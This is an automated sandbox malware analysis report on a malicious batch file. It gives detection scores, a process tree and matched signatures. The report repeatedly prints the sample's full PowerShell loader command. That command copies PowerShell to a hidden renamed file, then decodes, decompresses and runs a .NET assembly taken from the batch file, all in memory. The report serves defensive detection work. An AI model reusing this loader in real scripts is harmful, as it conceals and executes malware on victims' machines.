Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
INQ24-0122070030786451.bat

Overview

General Information

Sample name:INQ24-0122070030786451.bat
Analysis ID:1574509
MD5:f6f5132b639fe3009babd9094008115d
SHA1:3b6a5fefdffc66df9b1bc829f9295911c8260e19
SHA256:52f88aa8b5720e04788bae4f6d20019d6ad5cfd65e15c888f1d1b8cdba34b37e
Tags:batuser-cocaman
Infos:

Detection

Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
.NET source code contains potential unpacker
AI detected suspicious sample
Found large BAT file
Powershell is started from unusual location (likely to bypass HIPS)
Reads the Security eventlog
Reads the System eventlog
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Gzip Archive Decode Via PowerShell
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: Suspicious Copy From or To System Directory
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 5692 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\INQ24-0122070030786451.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 3596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • chcp.com (PID: 5704 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
    • cmd.exe (PID: 736 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo F " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • xcopy.exe (PID: 6348 cmdline: xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\Desktop\INQ24-0122070030786451.bat.Izu MD5: 39FBFD3AF58238C6F9D4D408C9251FF5)
    • attrib.exe (PID: 3712 cmdline: attrib +s +h C:\Users\user\Desktop\INQ24-0122070030786451.bat.Izu MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
    • INQ24-0122070030786451.bat.Izu (PID: 6600 cmdline: C:\Users\user\Desktop\INQ24-0122070030786451.bat.Izu -WindowStyle hidden -command "$Hohcwatlus = get-content 'C:\Users\user\Desktop\INQ24-0122070030786451.bat' | Select-Object -Last 1; $Qlhoh = [System.Convert]::FromBase64String($Hohcwatlus);$Mvwalaytoyd = New-Object System.IO.MemoryStream( , $Qlhoh );$Myhbvcux = New-Object System.IO.MemoryStream;$Uvlejdiywlp = New-Object System.IO.Compression.GzipStream $Mvwalaytoyd, ([IO.Compression.CompressionMode]::Decompress);$Uvlejdiywlp.CopyTo( $Myhbvcux );$Uvlejdiywlp.Close();$Mvwalaytoyd.Close();[byte[]] $Qlhoh = $Myhbvcux.ToArray();[Array]::Reverse($Qlhoh); $Rbyymtwxmx = [System.AppDomain]::CurrentDomain.Load($Qlhoh); $Qokucu = $Rbyymtwxmx.EntryPoint; $Qokucu.DeclaringType.InvokeMember($Qokucu.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.2143947753.000000000A770000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    00000007.00000002.2114245820.00000000057CB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
      00000007.00000002.2137479439.0000000009711000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        00000007.00000002.2114245820.0000000005397000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          Process Memory Space: INQ24-0122070030786451.bat.Izu PID: 6600JoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            Click to see the 2 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            7.2.INQ24-0122070030786451.bat.Izu.a770000.7.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              7.2.INQ24-0122070030786451.bat.Izu.991a058.5.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Base64 Encoded PowerShell Command Detected
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Users\user\Desktop\INQ24-0122070030786451.bat.Izu -WindowStyle hidden -command "$Hohcwatlus = get-content 'C:\Users\user\Desktop\INQ24-0122070030786451.bat' | Select-Object -Last 1; $Qlhoh = [System.Convert]::FromBase64String($Hohcwatlus);$Mvwalaytoyd = New-Object System.IO.MemoryStream( , $Qlhoh );$Myhbvcux = New-Object System.IO.MemoryStream;$Uvlejdiywlp = New-Object System.IO.Compression.GzipStream $Mvwalaytoyd, ([IO.Compression.CompressionMode]::Decompress);$Uvlejdiywlp.CopyTo( $Myhbvcux );$Uvlejdiywlp.Close();$Mvwalaytoyd.Close();[byte[]] $Qlhoh = $Myhbvcux.ToArray();[Array]::Reverse($Qlhoh); $Rbyymtwxmx = [System.AppDomain]::CurrentDomain.Load($Qlhoh); $Qokucu = $Rbyymtwxmx.EntryPoint; $Qokucu.DeclaringType.InvokeMember($Qokucu.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null", CommandLine: C:\Users\user\Desktop\INQ24-0122070030786451.bat.Izu -WindowStyle hidden -command "$Hohcwatlus = get-content 'C:\Users\user\Desktop\INQ24-0122070030786451.bat' | Select-Object -Last 1; $Qlhoh = [System.Convert]::FromBase64String($Hohcwatlus);$Mvwalaytoyd = New-Object System.IO.MemoryStream( , $Qlhoh );$Myhbvcux = New-Object System.IO.MemoryStream;$Uvlejdiywlp = New-Object System.IO.Compression.GzipStream $Mvwalaytoyd, ([IO.Compression.CompressionMode]::Decompress);$Uvlejdiywlp.CopyTo( $Myhbvcux );$Uvlejdiywlp.Close();$Mvwalaytoyd.Close();[byte[]] $Qlhoh = $Myhbvcux.ToArray();[Array]::Reverse($Qlhoh); $Rbyymtwxmx = [System.AppDomain]::CurrentDomain.Load($Qlhoh); $Qokucu = $Rbyymtwxmx.EntryPoint; $Qokucu.DeclaringType.InvokeMember($Qokucu.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null", CommandLine|base64offset|contains: hv)^, Image: C:\Users\user\Desktop\INQ24-0122070030786451.bat.Izu, NewProcessName: C:\Users\user\Desktop\INQ24-0122070030786451.bat.Izu, OriginalFileName: C:\Users\user\Desktop\INQ24-0122070030786451.bat.Izu, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\INQ24-0122070030786451.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5692, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\user\Desktop\INQ24-0122070030786451.bat.Izu -WindowStyle hidden -command "$Hohcwatlus = get-content 'C:\Users\user\Desktop\INQ24-0122070030786451.bat' | Select-Object -Last 1; $Qlhoh = [System.Convert]::FromBase64String($Hohcwatlus);$Mvwalaytoyd = New-Object System.IO.MemoryStream( , $Qlhoh );$Myhbvcux = New-Object System.IO.MemoryStream;$Uvlejdiywlp = New-Object System.IO.Compression.GzipStream $Mvwalaytoyd, ([IO.Compression.CompressionMode]::Decompress);$Uvlejdiywlp.CopyTo( $Myhbvcux );$Uvlejdiywlp.Close();$Mvwalaytoyd.Close();[byte[]] $Qlhoh = $Myhbvcux.ToArray();[Array]::Reverse($Qlhoh); $Rbyymtwxmx = [System.AppDomain]::CurrentDomain.Load($Qlhoh); $Qokucu = $Rbyymtwxmx.EntryPoint; $Qokucu.DeclaringType.InvokeMember($Qokucu.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $n
                Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Users\user\Desktop\INQ24-0122070030786451.bat.Izu -WindowStyle hidden -command "$Hohcwatlus = get-content 'C:\Users\user\Desktop\INQ24-0122070030786451.bat' | Select-Object -Last 1; $Qlhoh = [System.Convert]::FromBase64String($Hohcwatlus);$Mvwalaytoyd = New-Object System.IO.MemoryStream( , $Qlhoh );$Myhbvcux = New-Object System.IO.MemoryStream;$Uvlejdiywlp = New-Object System.IO.Compression.GzipStream $Mvwalaytoyd, ([IO.Compression.CompressionMode]::Decompress);$Uvlejdiywlp.CopyTo( $Myhbvcux );$Uvlejdiywlp.Close();$Mvwalaytoyd.Close();[byte[]] $Qlhoh = $Myhbvcux.ToArray();[Array]::Reverse($Qlhoh); $Rbyymtwxmx = [System.AppDomain]::CurrentDomain.Load($Qlhoh); $Qokucu = $Rbyymtwxmx.EntryPoint; $Qokucu.DeclaringType.InvokeMember($Qokucu.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null", CommandLine: C:\Users\user\Desktop\INQ24-0122070030786451.bat.Izu -WindowStyle hidden -command "$Hohcwatlus = get-content 'C:\Users\user\Desktop\INQ24-0122070030786451.bat' | Select-Object -Last 1; $Qlhoh = [System.Convert]::FromBase64String($Hohcwatlus);$Mvwalaytoyd = New-Object System.IO.MemoryStream( , $Qlhoh );$Myhbvcux = New-Object System.IO.MemoryStream;$Uvlejdiywlp = New-Object System.IO.Compression.GzipStream $Mvwalaytoyd, ([IO.Compression.CompressionMode]::Decompress);$Uvlejdiywlp.CopyTo( $Myhbvcux );$Uvlejdiywlp.Close();$Mvwalaytoyd.Close();[byte[]] $Qlhoh = $Myhbvcux.ToArray();[Array]::Reverse($Qlhoh); $Rbyymtwxmx = [System.AppDomain]::CurrentDomain.Load($Qlhoh); $Qokucu = $Rbyymtwxmx.EntryPoint; $Qokucu.DeclaringType.InvokeMember($Qokucu.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null", CommandLine|base64offset|contains: hv)^, Image: C:\Users\user\Desktop\INQ24-0122070030786451.bat.Izu, NewProcessName: C:\Users\user\Desktop\INQ24-0122070030786451.bat.Izu, OriginalFileName: C:\Users\user\Desktop\INQ24-0122070030786451.bat.Izu, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\INQ24-0122070030786451.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5692, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\user\Desktop\INQ24-0122070030786451.bat.Izu -WindowStyle hidden -command "$Hohcwatlus = get-content 'C:\Users\user\Desktop\INQ24-0122070030786451.bat' | Select-Object -Last 1; $Qlhoh = [System.Convert]::FromBase64String($Hohcwatlus);$Mvwalaytoyd = New-Object System.IO.MemoryStream( , $Qlhoh );$Myhbvcux = New-Object System.IO.MemoryStream;$Uvlejdiywlp = New-Object System.IO.Compression.GzipStream $Mvwalaytoyd, ([IO.Compression.CompressionMode]::Decompress);$Uvlejdiywlp.CopyTo( $Myhbvcux );$Uvlejdiywlp.Close();$Mvwalaytoyd.Close();[byte[]] $Qlhoh = $Myhbvcux.ToArray();[Array]::Reverse($Qlhoh); $Rbyymtwxmx = [System.AppDomain]::CurrentDomain.Load($Qlhoh); $Qokucu = $Rbyymtwxmx.EntryPoint; $Qokucu.DeclaringType.InvokeMember($Qokucu.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $n
                Sigma detected: Execution of Suspicious File Type Extension
                Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\Desktop\INQ24-0122070030786451.bat.Izu -WindowStyle hidden -command "$Hohcwatlus = get-content 'C:\Users\user\Desktop\INQ24-0122070030786451.bat' | Select-Object -Last 1; $Qlhoh = [System.Convert]::FromBase64String($Hohcwatlus);$Mvwalaytoyd = New-Object System.IO.MemoryStream( , $Qlhoh );$Myhbvcux = New-Object System.IO.MemoryStream;$Uvlejdiywlp = New-Object System.IO.Compression.GzipStream $Mvwalaytoyd, ([IO.Compression.CompressionMode]::Decompress);$Uvlejdiywlp.CopyTo( $Myhbvcux );$Uvlejdiywlp.Close();$Mvwalaytoyd.Close();[byte[]] $Qlhoh = $Myhbvcux.ToArray();[Array]::Reverse($Qlhoh); $Rbyymtwxmx = [System.AppDomain]::CurrentDomain.Load($Qlhoh); $Qokucu = $Rbyymtwxmx.EntryPoint; $Qokucu.DeclaringType.InvokeMember($Qokucu.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null", CommandLine: C:\Users\user\Desktop\INQ24-0122070030786451.bat.Izu -WindowStyle hidden -command "$Hohcwatlus = get-content 'C:\Users\user\Desktop\INQ24-0122070030786451.bat' | Select-Object -Last 1; $Qlhoh = [System.Convert]::FromBase64String($Hohcwatlus);$Mvwalaytoyd = New-Object System.IO.MemoryStream( , $Qlhoh );$Myhbvcux = New-Object System.IO.MemoryStream;$Uvlejdiywlp = New-Object System.IO.Compression.GzipStream $Mvwalaytoyd, ([IO.Compression.CompressionMode]::Decompress);$Uvlejdiywlp.CopyTo( $Myhbvcux );$Uvlejdiywlp.Close();$Mvwalaytoyd.Close();[byte[]] $Qlhoh = $Myhbvcux.ToArray();[Array]::Reverse($Qlhoh); $Rbyymtwxmx = [System.AppDomain]::CurrentDomain.Load($Qlhoh); $Qokucu = $Rbyymtwxmx.EntryPoint; $Qokucu.DeclaringType.InvokeMember($Qokucu.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null", CommandLine|base64offset|contains: hv)^, Image: C:\Users\user\Desktop\INQ24-0122070030786451.bat.Izu, NewProcessName: C:\Users\user\Desktop\INQ24-0122070030786451.bat.Izu, OriginalFileName: C:\Users\user\Desktop\INQ24-0122070030786451.bat.Izu, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\INQ24-0122070030786451.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5692, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\user\Desktop\INQ24-0122070030786451.bat.Izu -WindowStyle hidden -command "$Hohcwatlus = get-content 'C:\Users\user\Desktop\INQ24-0122070030786451.bat' | Select-Object -Last 1; $Qlhoh = [System.Convert]::FromBase64String($Hohcwatlus);$Mvwalaytoyd = New-Object System.IO.MemoryStream( , $Qlhoh );$Myhbvcux = New-Object System.IO.MemoryStream;$Uvlejdiywlp = New-Object System.IO.Compression.GzipStream $Mvwalaytoyd, ([IO.Compression.CompressionMode]::Decompress);$Uvlejdiywlp.CopyTo( $Myhbvcux );$Uvlejdiywlp.Close();$Mvwalaytoyd.Close();[byte[]] $Qlhoh = $Myhbvcux.ToArray();[Array]::Reverse($Qlhoh); $Rbyymtwxmx = [System.AppDomain]::CurrentDomain.Load($Qlhoh); $Qokucu = $Rbyymtwxmx.EntryPoint; $Qokucu.DeclaringType.InvokeMember($Qokucu.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $n
                Sigma detected: Gzip Archive Decode Via PowerShell
                Source: Process startedAuthor: Hieu Tran: Data: Command: C:\Users\user\Desktop\INQ24-0122070030786451.bat.Izu -WindowStyle hidden -command "$Hohcwatlus = get-content 'C:\Users\user\Desktop\INQ24-0122070030786451.bat' | Select-Object -Last 1; $Qlhoh = [System.Convert]::FromBase64String($Hohcwatlus);$Mvwalaytoyd = New-Object System.IO.MemoryStream( , $Qlhoh );$Myhbvcux = New-Object System.IO.MemoryStream;$Uvlejdiywlp = New-Object System.IO.Compression.GzipStream $Mvwalaytoyd, ([IO.Compression.CompressionMode]::Decompress);$Uvlejdiywlp.CopyTo( $Myhbvcux );$Uvlejdiywlp.Close();$Mvwalaytoyd.Close();[byte[]] $Qlhoh = $Myhbvcux.ToArray();[Array]::Reverse($Qlhoh); $Rbyymtwxmx = [System.AppDomain]::CurrentDomain.Load($Qlhoh); $Qokucu = $Rbyymtwxmx.EntryPoint; $Qokucu.DeclaringType.InvokeMember($Qokucu.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null", CommandLine: C:\Users\user\Desktop\INQ24-0122070030786451.bat.Izu -WindowStyle hidden -command "$Hohcwatlus = get-content 'C:\Users\user\Desktop\INQ24-0122070030786451.bat' | Select-Object -Last 1; $Qlhoh = [System.Convert]::FromBase64String($Hohcwatlus);$Mvwalaytoyd = New-Object System.IO.MemoryStream( , $Qlhoh );$Myhbvcux = New-Object System.IO.MemoryStream;$Uvlejdiywlp = New-Object System.IO.Compression.GzipStream $Mvwalaytoyd, ([IO.Compression.CompressionMode]::Decompress);$Uvlejdiywlp.CopyTo( $Myhbvcux );$Uvlejdiywlp.Close();$Mvwalaytoyd.Close();[byte[]] $Qlhoh = $Myhbvcux.ToArray();[Array]::Reverse($Qlhoh); $Rbyymtwxmx = [System.AppDomain]::CurrentDomain.Load($Qlhoh); $Qokucu = $Rbyymtwxmx.EntryPoint; $Qokucu.DeclaringType.InvokeMember($Qokucu.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null", CommandLine|base64offset|contains: hv)^, Image: C:\Users\user\Desktop\INQ24-0122070030786451.bat.Izu, NewProcessName: C:\Users\user\Desktop\INQ24-0122070030786451.bat.Izu, OriginalFileName: C:\Users\user\Desktop\INQ24-0122070030786451.bat.Izu, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\INQ24-0122070030786451.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5692, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\user\Desktop\INQ24-0122070030786451.bat.Izu -WindowStyle hidden -command "$Hohcwatlus = get-content 'C:\Users\user\Desktop\INQ24-0122070030786451.bat' | Select-Object -Last 1; $Qlhoh = [System.Convert]::FromBase64String($Hohcwatlus);$Mvwalaytoyd = New-Object System.IO.MemoryStream( , $Qlhoh );$Myhbvcux = New-Object System.IO.MemoryStream;$Uvlejdiywlp = New-Object System.IO.Compression.GzipStream $Mvwalaytoyd, ([IO.Compression.CompressionMode]::Decompress);$Uvlejdiywlp.CopyTo( $Myhbvcux );$Uvlejdiywlp.Close();$Mvwalaytoyd.Close();[byte[]] $Qlhoh = $Myhbvcux.ToArray();[Array]::Reverse($Qlhoh); $Rbyymtwxmx = [System.AppDomain]::CurrentDomain.Load($Qlhoh); $Qokucu = $Rbyymtwxmx.EntryPoint; $Qokucu.DeclaringType.InvokeMember($Qokucu.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $n
                Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
                Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\INQ24-0122070030786451.bat.Izu, ProcessId: 6600, TargetFilename: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o1aylkvg.cqn.ps1
                Sigma detected: Suspicious Copy From or To System Directory
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\Desktop\INQ24-0122070030786451.bat.Izu, CommandLine: xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\Desktop\INQ24-0122070030786451.bat.Izu, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\xcopy.exe, NewProcessName: C:\Windows\System32\xcopy.exe, OriginalFileName: C:\Windows\System32\xcopy.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\INQ24-0122070030786451.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5692, ParentProcessName: cmd.exe, ProcessCommandLine: xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\Desktop\INQ24-0122070030786451.bat.Izu, ProcessId: 6348, ProcessName: xcopy.exe

                Suricata Signatures

                No Suricata rule has matched

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.6% probability
                Source: Binary string: powershell.pdbUGP source: INQ24-0122070030786451.bat.Izu, 00000007.00000000.2064268725.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, INQ24-0122070030786451.bat.Izu.4.dr
                Source: Binary string: protobuf-net.pdbSHA256}Lq source: INQ24-0122070030786451.bat.Izu, 00000007.00000002.2114245820.00000000057CB000.00000004.00000800.00020000.00000000.sdmp, INQ24-0122070030786451.bat.Izu, 00000007.00000002.2143414095.000000000A710000.00000004.08000000.00040000.00000000.sdmp, INQ24-0122070030786451.bat.Izu, 00000007.00000002.2118916133.0000000006E19000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: protobuf-net.pdb source: INQ24-0122070030786451.bat.Izu, 00000007.00000002.2114245820.00000000057CB000.00000004.00000800.00020000.00000000.sdmp, INQ24-0122070030786451.bat.Izu, 00000007.00000002.2143414095.000000000A710000.00000004.08000000.00040000.00000000.sdmp, INQ24-0122070030786451.bat.Izu, 00000007.00000002.2118916133.0000000006E19000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: powershell.pdb source: INQ24-0122070030786451.bat.Izu, 00000007.00000000.2064268725.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, INQ24-0122070030786451.bat.Izu.4.dr
                Source: INQ24-0122070030786451.bat.Izu, 00000007.00000002.2118916133.00000000062A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: INQ24-0122070030786451.bat.Izu, 00000007.00000002.2114245820.0000000005397000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: INQ24-0122070030786451.bat.Izu, 00000007.00000002.2114245820.0000000005241000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: INQ24-0122070030786451.bat.Izu, 00000007.00000002.2114245820.0000000005397000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: INQ24-0122070030786451.bat.Izu, 00000007.00000002.2114245820.0000000005241000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                Source: INQ24-0122070030786451.bat.Izu, 00000007.00000002.2118916133.00000000062A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: INQ24-0122070030786451.bat.Izu, 00000007.00000002.2118916133.00000000062A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: INQ24-0122070030786451.bat.Izu, 00000007.00000002.2118916133.00000000062A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: INQ24-0122070030786451.bat.Izu, 00000007.00000002.2114245820.0000000005397000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: INQ24-0122070030786451.bat.Izu, 00000007.00000002.2114245820.00000000057CB000.00000004.00000800.00020000.00000000.sdmp, INQ24-0122070030786451.bat.Izu, 00000007.00000002.2143414095.000000000A710000.00000004.08000000.00040000.00000000.sdmp, INQ24-0122070030786451.bat.Izu, 00000007.00000002.2118916133.0000000006E19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                Source: INQ24-0122070030786451.bat.Izu, 00000007.00000002.2114245820.00000000057CB000.00000004.00000800.00020000.00000000.sdmp, INQ24-0122070030786451.bat.Izu, 00000007.00000002.2143414095.000000000A710000.00000004.08000000.00040000.00000000.sdmp, INQ24-0122070030786451.bat.Izu, 00000007.00000002.2118916133.0000000006E19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                Source: INQ24-0122070030786451.bat.Izu, 00000007.00000002.2114245820.00000000057CB000.00000004.00000800.00020000.00000000.sdmp, INQ24-0122070030786451.bat.Izu, 00000007.00000002.2143414095.000000000A710000.00000004.08000000.00040000.00000000.sdmp, INQ24-0122070030786451.bat.Izu, 00000007.00000002.2118916133.0000000006E19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                Source: INQ24-0122070030786451.bat.Izu, 00000007.00000002.2118916133.00000000062A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: INQ24-0122070030786451.bat.Izu, 00000007.00000002.2114245820.00000000057CB000.00000004.00000800.00020000.00000000.sdmp, INQ24-0122070030786451.bat.Izu, 00000007.00000002.2143414095.000000000A710000.00000004.08000000.00040000.00000000.sdmp, INQ24-0122070030786451.bat.Izu, 00000007.00000002.2118916133.0000000006E19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                Source: INQ24-0122070030786451.bat.Izu, 00000007.00000002.2114245820.00000000057CB000.00000004.00000800.00020000.00000000.sdmp, INQ24-0122070030786451.bat.Izu, 00000007.00000002.2114245820.000000000595A000.00000004.00000800.00020000.00000000.sdmp, INQ24-0122070030786451.bat.Izu, 00000007.00000002.2143414095.000000000A710000.00000004.08000000.00040000.00000000.sdmp, INQ24-0122070030786451.bat.Izu, 00000007.00000002.2114245820.0000000005397000.00000004.00000800.00020000.00000000.sdmp, INQ24-0122070030786451.bat.Izu, 00000007.00000002.2118916133.0000000006E19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                Source: INQ24-0122070030786451.bat.Izu, 00000007.00000002.2143414095.000000000A710000.00000004.08000000.00040000.00000000.sdmp, INQ24-0122070030786451.bat.Izu, 00000007.00000002.2118916133.0000000006E19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354

                Spam, unwanted Advertisements and Ransom Demands

                barindex
                Reads the Security eventlog
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                Reads the System eventlog
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: Process Memory Space: INQ24-0122070030786451.bat.Izu PID: 6600, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Found large BAT file
                Source: INQ24-0122070030786451.batStatic file information: 2039860
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuCode function: 7_2_0A8318207_2_0A831820
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuCode function: 7_2_0A830F507_2_0A830F50
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuCode function: 7_2_0A830C087_2_0A830C08
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuCode function: 7_2_0724F4C87_2_0724F4C8
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuCode function: 7_2_08FF4AB87_2_08FF4AB8
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuCode function: 7_2_08FF01607_2_08FF0160
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuCode function: 7_2_08FF01507_2_08FF0150
